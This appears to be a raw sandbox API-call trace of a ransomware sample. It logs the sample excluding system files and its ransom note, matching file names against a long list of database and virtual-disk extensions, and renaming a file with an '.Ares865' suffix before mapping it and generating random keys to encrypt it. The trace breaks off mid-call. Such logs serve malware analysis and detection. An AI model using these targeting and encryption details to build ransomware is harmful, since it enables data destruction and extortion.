ftCreationTime.dwLowDateTime=0xa912d270, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa912d270, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xe9f9cff0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x2fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0072.412] lstrcmpiW (lpString1="state.rsm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0072.414] lstrcmpiW (lpString1="state.rsm", lpString2="aoldtz.exe") returned 1 [0072.415] lstrcmpiW (lpString1="state.rsm", lpString2=".") returned 1 [0072.415] lstrcmpiW (lpString1="state.rsm", lpString2="..") returned 1 [0072.416] lstrcmpiW (lpString1="state.rsm", lpString2="windows") returned -1 [0072.416] lstrcmpiW (lpString1="state.rsm", lpString2="bootmgr") returned 1 [0072.418] lstrcmpiW (lpString1="state.rsm", lpString2="temp") returned -1 [0072.418] lstrcmpiW (lpString1="state.rsm", lpString2="pagefile.sys") returned 1 [0072.418] lstrcmpiW (lpString1="state.rsm", lpString2="boot") returned 1 [0072.419] lstrcmpiW (lpString1="state.rsm", lpString2="ids.txt") returned 1 [0072.420] lstrcmpiW (lpString1="state.rsm", lpString2="ntuser.dat") returned 1 [0072.420] lstrcmpiW (lpString1="state.rsm", lpString2="perflogs") returned 1 [0072.421] lstrcmpiW (lpString1="state.rsm", lpString2="MSBuild") returned 1 [0072.423] lstrlenW (lpString="state.rsm") returned 9 [0072.427] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\*") returned 73 [0072.427] lstrcpyW (in: lpString1=0x2cce490, lpString2="state.rsm" | out: lpString1="state.rsm") returned="state.rsm" [0072.427] lstrlenW (lpString="state.rsm") returned 9 [0072.427] lstrlenW (lpString="Ares865") returned 7 [0072.428] lstrcmpiW (lpString1="ate.rsm", lpString2="Ares865") returned 1 [0072.428] lstrlenW (lpString=".dll") returned 4 [0072.429] lstrcmpiW (lpString1="state.rsm", lpString2=".dll") returned 1 [0072.430] lstrlenW (lpString=".lnk") returned 4 [0072.430] lstrcmpiW (lpString1="state.rsm", lpString2=".lnk") returned 1 [0072.430] lstrlenW (lpString=".ini") returned 4 [0072.431] lstrcmpiW (lpString1="state.rsm", lpString2=".ini") returned 1 [0072.432] lstrlenW (lpString=".sys") returned 4 [0072.432] lstrcmpiW (lpString1="state.rsm", lpString2=".sys") returned 1 [0072.432] lstrlenW (lpString="state.rsm") returned 9 [0072.432] lstrlenW (lpString="bak") returned 3 [0072.433] lstrcmpiW (lpString1="rsm", lpString2="bak") returned 1 [0072.433] lstrlenW (lpString="ba_") returned 3 [0072.433] lstrcmpiW (lpString1="rsm", lpString2="ba_") returned 1 [0072.434] lstrlenW (lpString="dbb") returned 3 [0072.436] lstrcmpiW (lpString1="rsm", lpString2="dbb") returned 1 [0072.436] lstrlenW (lpString="vmdk") returned 4 [0072.437] lstrcmpiW (lpString1=".rsm", lpString2="vmdk") returned -1 [0072.437] lstrlenW (lpString="rar") returned 3 [0072.437] lstrcmpiW (lpString1="rsm", lpString2="rar") returned 1 [0072.438] lstrlenW (lpString="zip") returned 3 [0072.438] lstrcmpiW (lpString1="rsm", lpString2="zip") returned -1 [0072.438] lstrlenW (lpString="tgz") returned 3 [0072.439] lstrcmpiW (lpString1="rsm", lpString2="tgz") returned -1 [0072.440] lstrlenW (lpString="vbox") returned 4 [0072.440] lstrcmpiW (lpString1=".rsm", lpString2="vbox") returned -1 [0072.440] lstrlenW (lpString="vdi") returned 3 [0072.441] lstrcmpiW (lpString1="rsm", lpString2="vdi") returned -1 [0072.441] lstrlenW (lpString="vhd") returned 3 [0072.441] lstrcmpiW (lpString1="rsm", lpString2="vhd") returned -1 [0072.442] lstrlenW (lpString="vhdx") returned 4 [0072.472] lstrcmpiW (lpString1=".rsm", lpString2="vhdx") returned -1 [0072.472] lstrlenW (lpString="avhd") returned 4 [0072.472] lstrcmpiW (lpString1=".rsm", lpString2="avhd") returned -1 [0072.472] lstrlenW (lpString="db") returned 2 [0072.472] lstrcmpiW (lpString1="sm", lpString2="db") returned 1 [0072.472] lstrlenW (lpString="db2") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="db2") returned 1 [0072.472] lstrlenW (lpString="db3") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="db3") returned 1 [0072.472] lstrlenW (lpString="dbf") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="dbf") returned 1 [0072.472] lstrlenW (lpString="mdf") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="mdf") returned 1 [0072.472] lstrlenW (lpString="mdb") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="mdb") returned 1 [0072.472] lstrlenW (lpString="sql") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="sql") returned -1 [0072.472] lstrlenW (lpString="sqlite") returned 6 [0072.472] lstrcmpiW (lpString1="te.rsm", lpString2="sqlite") returned 1 [0072.472] lstrlenW (lpString="sqlite3") returned 7 [0072.472] lstrcmpiW (lpString1="ate.rsm", lpString2="sqlite3") returned -1 [0072.472] lstrlenW (lpString="sqlitedb") returned 8 [0072.472] lstrcmpiW (lpString1="tate.rsm", lpString2="sqlitedb") returned 1 [0072.472] lstrlenW (lpString="xml") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="xml") returned -1 [0072.472] lstrlenW (lpString="$er") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="$er") returned 1 [0072.472] lstrlenW (lpString="4dd") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="4dd") returned 1 [0072.472] lstrlenW (lpString="4dl") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="4dl") returned 1 [0072.472] lstrlenW (lpString="^^^") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="^^^") returned 1 [0072.472] lstrlenW (lpString="abs") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="abs") returned 1 [0072.472] lstrlenW (lpString="abx") returned 3 [0072.472] lstrcmpiW (lpString1="rsm", lpString2="abx") returned 1 [0072.472] lstrlenW (lpString="accdb") returned 5 [0072.472] lstrcmpiW (lpString1="e.rsm", lpString2="accdb") returned 1 [0072.473] lstrlenW (lpString="accdc") returned 5 [0072.473] lstrcmpiW (lpString1="e.rsm", lpString2="accdc") returned 1 [0072.473] lstrlenW (lpString="accde") returned 5 [0072.473] lstrcmpiW (lpString1="e.rsm", lpString2="accde") returned 1 [0072.473] lstrlenW (lpString="accdr") returned 5 [0072.473] lstrcmpiW (lpString1="e.rsm", lpString2="accdr") returned 1 [0072.473] lstrlenW (lpString="accdt") returned 5 [0072.473] lstrcmpiW (lpString1="e.rsm", lpString2="accdt") returned 1 [0072.473] lstrlenW (lpString="accdw") returned 5 [0072.473] lstrcmpiW (lpString1="e.rsm", lpString2="accdw") returned 1 [0072.473] lstrlenW (lpString="accft") returned 5 [0072.473] lstrcmpiW (lpString1="e.rsm", lpString2="accft") returned 1 [0072.473] lstrlenW (lpString="adb") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0072.473] lstrlenW (lpString="adb") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="adb") returned 1 [0072.473] lstrlenW (lpString="ade") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="ade") returned 1 [0072.473] lstrlenW (lpString="adf") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="adf") returned 1 [0072.473] lstrlenW (lpString="adn") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="adn") returned 1 [0072.473] lstrlenW (lpString="adp") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="adp") returned 1 [0072.473] lstrlenW (lpString="alf") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="alf") returned 1 [0072.473] lstrlenW (lpString="ask") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="ask") returned 1 [0072.473] lstrlenW (lpString="btr") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="btr") returned 1 [0072.473] lstrlenW (lpString="cat") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="cat") returned 1 [0072.473] lstrlenW (lpString="cdb") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="cdb") returned 1 [0072.473] lstrlenW (lpString="ckp") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="ckp") returned 1 [0072.473] lstrlenW (lpString="cma") returned 3 [0072.473] lstrcmpiW (lpString1="rsm", lpString2="cma") returned 1 [0072.474] lstrlenW (lpString="cpd") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="cpd") returned 1 [0072.474] lstrlenW (lpString="dacpac") returned 6 [0072.474] lstrcmpiW (lpString1="te.rsm", lpString2="dacpac") returned 1 [0072.474] lstrlenW (lpString="dad") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dad") returned 1 [0072.474] lstrlenW (lpString="dadiagrams") returned 10 [0072.474] lstrlenW (lpString="daschema") returned 8 [0072.474] lstrcmpiW (lpString1="tate.rsm", lpString2="daschema") returned 1 [0072.474] lstrlenW (lpString="db-journal") returned 10 [0072.474] lstrlenW (lpString="db-shm") returned 6 [0072.474] lstrcmpiW (lpString1="te.rsm", lpString2="db-shm") returned 1 [0072.474] lstrlenW (lpString="db-wal") returned 6 [0072.474] lstrcmpiW (lpString1="te.rsm", lpString2="db-wal") returned 1 [0072.474] lstrlenW (lpString="dbc") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dbc") returned 1 [0072.474] lstrlenW (lpString="dbs") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dbs") returned 1 [0072.474] lstrlenW (lpString="dbt") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dbt") returned 1 [0072.474] lstrlenW (lpString="dbv") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dbv") returned 1 [0072.474] lstrlenW (lpString="dbx") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dbx") returned 1 [0072.474] lstrlenW (lpString="dcb") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dcb") returned 1 [0072.474] lstrlenW (lpString="dct") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dct") returned 1 [0072.474] lstrlenW (lpString="dcx") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dcx") returned 1 [0072.474] lstrlenW (lpString="ddl") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="ddl") returned 1 [0072.474] lstrlenW (lpString="dlis") returned 4 [0072.474] lstrcmpiW (lpString1=".rsm", lpString2="dlis") returned -1 [0072.474] lstrlenW (lpString="dp1") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dp1") returned 1 [0072.474] lstrlenW (lpString="dqy") returned 3 [0072.474] lstrcmpiW (lpString1="rsm", lpString2="dqy") returned 1 [0072.474] lstrlenW (lpString="dsk") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="dsk") returned 1 [0072.475] lstrlenW (lpString="dsn") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="dsn") returned 1 [0072.475] lstrlenW (lpString="dtsx") returned 4 [0072.475] lstrcmpiW (lpString1=".rsm", lpString2="dtsx") returned -1 [0072.475] lstrlenW (lpString="dxl") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="dxl") returned 1 [0072.475] lstrlenW (lpString="eco") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="eco") returned 1 [0072.475] lstrlenW (lpString="ecx") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="ecx") returned 1 [0072.475] lstrlenW (lpString="edb") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="edb") returned 1 [0072.475] lstrlenW (lpString="epim") returned 4 [0072.475] lstrcmpiW (lpString1=".rsm", lpString2="epim") returned -1 [0072.475] lstrlenW (lpString="fcd") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fcd") returned 1 [0072.475] lstrlenW (lpString="fdb") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fdb") returned 1 [0072.475] lstrlenW (lpString="fic") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fic") returned 1 [0072.475] lstrlenW (lpString="flexolibrary") returned 12 [0072.475] lstrlenW (lpString="fm5") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fm5") returned 1 [0072.475] lstrlenW (lpString="fmp") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fmp") returned 1 [0072.475] lstrlenW (lpString="fmp12") returned 5 [0072.475] lstrcmpiW (lpString1="e.rsm", lpString2="fmp12") returned -1 [0072.475] lstrlenW (lpString="fmpsl") returned 5 [0072.475] lstrcmpiW (lpString1="e.rsm", lpString2="fmpsl") returned -1 [0072.475] lstrlenW (lpString="fol") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fol") returned 1 [0072.475] lstrlenW (lpString="fp3") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fp3") returned 1 [0072.475] lstrlenW (lpString="fp4") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fp4") returned 1 [0072.475] lstrlenW (lpString="fp5") returned 3 [0072.475] lstrcmpiW (lpString1="rsm", lpString2="fp5") returned 1 [0072.476] lstrlenW (lpString="fp7") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="fp7") returned 1 [0072.476] lstrlenW (lpString="fpt") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="fpt") returned 1 [0072.476] lstrlenW (lpString="frm") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="frm") returned 1 [0072.476] lstrlenW (lpString="gdb") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0072.476] lstrlenW (lpString="gdb") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="gdb") returned 1 [0072.476] lstrlenW (lpString="grdb") returned 4 [0072.476] lstrcmpiW (lpString1=".rsm", lpString2="grdb") returned -1 [0072.476] lstrlenW (lpString="gwi") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="gwi") returned 1 [0072.476] lstrlenW (lpString="hdb") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="hdb") returned 1 [0072.476] lstrlenW (lpString="his") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="his") returned 1 [0072.476] lstrlenW (lpString="ib") returned 2 [0072.476] lstrcmpiW (lpString1="sm", lpString2="ib") returned 1 [0072.476] lstrlenW (lpString="idb") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="idb") returned 1 [0072.476] lstrlenW (lpString="ihx") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="ihx") returned 1 [0072.476] lstrlenW (lpString="itdb") returned 4 [0072.476] lstrcmpiW (lpString1=".rsm", lpString2="itdb") returned -1 [0072.476] lstrlenW (lpString="itw") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="itw") returned 1 [0072.476] lstrlenW (lpString="jet") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="jet") returned 1 [0072.476] lstrlenW (lpString="jtx") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="jtx") returned 1 [0072.476] lstrlenW (lpString="kdb") returned 3 [0072.476] lstrcmpiW (lpString1="rsm", lpString2="kdb") returned 1 [0072.476] lstrlenW (lpString="kexi") returned 4 [0072.476] lstrcmpiW (lpString1=".rsm", lpString2="kexi") returned -1 [0072.476] lstrlenW (lpString="kexic") returned 5 [0072.476] lstrcmpiW (lpString1="e.rsm", lpString2="kexic") returned -1 [0072.476] lstrlenW (lpString="kexis") returned 5 [0072.477] lstrcmpiW (lpString1="e.rsm", lpString2="kexis") returned -1 [0072.477] lstrlenW (lpString="lgc") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="lgc") returned 1 [0072.477] lstrlenW (lpString="lwx") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="lwx") returned 1 [0072.477] lstrlenW (lpString="maf") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="maf") returned 1 [0072.477] lstrlenW (lpString="maq") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="maq") returned 1 [0072.477] lstrlenW (lpString="mar") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mar") returned 1 [0072.477] lstrlenW (lpString="marshal") returned 7 [0072.477] lstrcmpiW (lpString1="ate.rsm", lpString2="marshal") returned -1 [0072.477] lstrlenW (lpString="mas") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mas") returned 1 [0072.477] lstrlenW (lpString="mav") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mav") returned 1 [0072.477] lstrlenW (lpString="maw") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="maw") returned 1 [0072.477] lstrlenW (lpString="mdbhtml") returned 7 [0072.477] lstrcmpiW (lpString1="ate.rsm", lpString2="mdbhtml") returned -1 [0072.477] lstrlenW (lpString="mdn") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mdn") returned 1 [0072.477] lstrlenW (lpString="mdt") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mdt") returned 1 [0072.477] lstrlenW (lpString="mfd") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mfd") returned 1 [0072.477] lstrlenW (lpString="mpd") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mpd") returned 1 [0072.477] lstrlenW (lpString="mrg") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mrg") returned 1 [0072.477] lstrlenW (lpString="mud") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mud") returned 1 [0072.477] lstrlenW (lpString="mwb") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="mwb") returned 1 [0072.477] lstrlenW (lpString="myd") returned 3 [0072.477] lstrcmpiW (lpString1="rsm", lpString2="myd") returned 1 [0072.477] lstrlenW (lpString="ndf") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="ndf") returned 1 [0072.478] lstrlenW (lpString="nnt") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="nnt") returned 1 [0072.478] lstrlenW (lpString="nrmlib") returned 6 [0072.478] lstrcmpiW (lpString1="te.rsm", lpString2="nrmlib") returned 1 [0072.478] lstrlenW (lpString="ns2") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="ns2") returned 1 [0072.478] lstrlenW (lpString="ns3") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="ns3") returned 1 [0072.478] lstrlenW (lpString="ns4") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="ns4") returned 1 [0072.478] lstrlenW (lpString="nsf") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="nsf") returned 1 [0072.478] lstrlenW (lpString="nv") returned 2 [0072.478] lstrcmpiW (lpString1="sm", lpString2="nv") returned 1 [0072.478] lstrlenW (lpString="nv2") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="nv2") returned 1 [0072.478] lstrlenW (lpString="nwdb") returned 4 [0072.478] lstrcmpiW (lpString1=".rsm", lpString2="nwdb") returned -1 [0072.478] lstrlenW (lpString="nyf") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="nyf") returned 1 [0072.478] lstrlenW (lpString="odb") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0072.478] lstrlenW (lpString="odb") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="odb") returned 1 [0072.478] lstrlenW (lpString="oqy") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="oqy") returned 1 [0072.478] lstrlenW (lpString="ora") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="ora") returned 1 [0072.478] lstrlenW (lpString="orx") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="orx") returned 1 [0072.478] lstrlenW (lpString="owc") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="owc") returned 1 [0072.478] lstrlenW (lpString="p96") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="p96") returned 1 [0072.478] lstrlenW (lpString="p97") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="p97") returned 1 [0072.478] lstrlenW (lpString="pan") returned 3 [0072.478] lstrcmpiW (lpString1="rsm", lpString2="pan") returned 1 [0072.479] lstrlenW (lpString="pdb") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="pdb") returned 1 [0072.479] lstrlenW (lpString="pdm") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="pdm") returned 1 [0072.479] lstrlenW (lpString="pnz") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="pnz") returned 1 [0072.479] lstrlenW (lpString="qry") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="qry") returned 1 [0072.479] lstrlenW (lpString="qvd") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="qvd") returned 1 [0072.479] lstrlenW (lpString="rbf") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="rbf") returned 1 [0072.479] lstrlenW (lpString="rctd") returned 4 [0072.479] lstrcmpiW (lpString1=".rsm", lpString2="rctd") returned -1 [0072.479] lstrlenW (lpString="rod") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="rod") returned 1 [0072.479] lstrlenW (lpString="rodx") returned 4 [0072.479] lstrcmpiW (lpString1=".rsm", lpString2="rodx") returned -1 [0072.479] lstrlenW (lpString="rpd") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="rpd") returned 1 [0072.479] lstrlenW (lpString="rsd") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="rsd") returned 1 [0072.479] lstrlenW (lpString="sas7bdat") returned 8 [0072.479] lstrcmpiW (lpString1="tate.rsm", lpString2="sas7bdat") returned 1 [0072.479] lstrlenW (lpString="sbf") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="sbf") returned -1 [0072.479] lstrlenW (lpString="scx") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="scx") returned -1 [0072.479] lstrlenW (lpString="sdb") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="sdb") returned -1 [0072.479] lstrlenW (lpString="sdc") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="sdc") returned -1 [0072.479] lstrlenW (lpString="sdf") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="sdf") returned -1 [0072.479] lstrlenW (lpString="sis") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="sis") returned -1 [0072.479] lstrlenW (lpString="spq") returned 3 [0072.479] lstrcmpiW (lpString1="rsm", lpString2="spq") returned -1 [0072.480] lstrlenW (lpString="te") returned 2 [0072.480] lstrcmpiW (lpString1="sm", lpString2="te") returned -1 [0072.480] lstrlenW (lpString="teacher") returned 7 [0072.480] lstrcmpiW (lpString1="ate.rsm", lpString2="teacher") returned -1 [0072.480] lstrlenW (lpString="tmd") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="tmd") returned -1 [0072.480] lstrlenW (lpString="tps") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="tps") returned -1 [0072.480] lstrlenW (lpString="trc") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0072.480] lstrlenW (lpString="trc") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="trc") returned -1 [0072.480] lstrlenW (lpString="trm") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="trm") returned -1 [0072.480] lstrlenW (lpString="udb") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="udb") returned -1 [0072.480] lstrlenW (lpString="udl") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="udl") returned -1 [0072.480] lstrlenW (lpString="usr") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="usr") returned -1 [0072.480] lstrlenW (lpString="v12") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="v12") returned -1 [0072.480] lstrlenW (lpString="vis") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="vis") returned -1 [0072.480] lstrlenW (lpString="vpd") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="vpd") returned -1 [0072.480] lstrlenW (lpString="vvv") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="vvv") returned -1 [0072.480] lstrlenW (lpString="wdb") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="wdb") returned -1 [0072.480] lstrlenW (lpString="wmdb") returned 4 [0072.480] lstrcmpiW (lpString1=".rsm", lpString2="wmdb") returned -1 [0072.480] lstrlenW (lpString="wrk") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="wrk") returned -1 [0072.480] lstrlenW (lpString="xdb") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="xdb") returned -1 [0072.480] lstrlenW (lpString="xld") returned 3 [0072.480] lstrcmpiW (lpString1="rsm", lpString2="xld") returned -1 [0072.480] lstrlenW (lpString="xmlff") returned 5 [0072.481] lstrcmpiW (lpString1="e.rsm", lpString2="xmlff") returned -1 [0072.481] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.Ares865") returned 89 [0072.481] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.ares865"), dwFlags=0x1) returned 1 [0072.482] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.Ares865" (normalized: "c:\\users\\all users\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0072.482] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=766) returned 1 [0072.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0072.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0072.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0072.528] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0072.529] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0072.529] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0072.529] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x600, lpName=0x0) returned 0x154 [0072.531] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x600) returned 0x190000 [0072.533] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0072.533] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0072.533] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0072.533] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0072.533] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0072.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0072.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0072.534] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0072.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0072.534] RtlAllocateHeap (HeapHandle=0x2b0000, 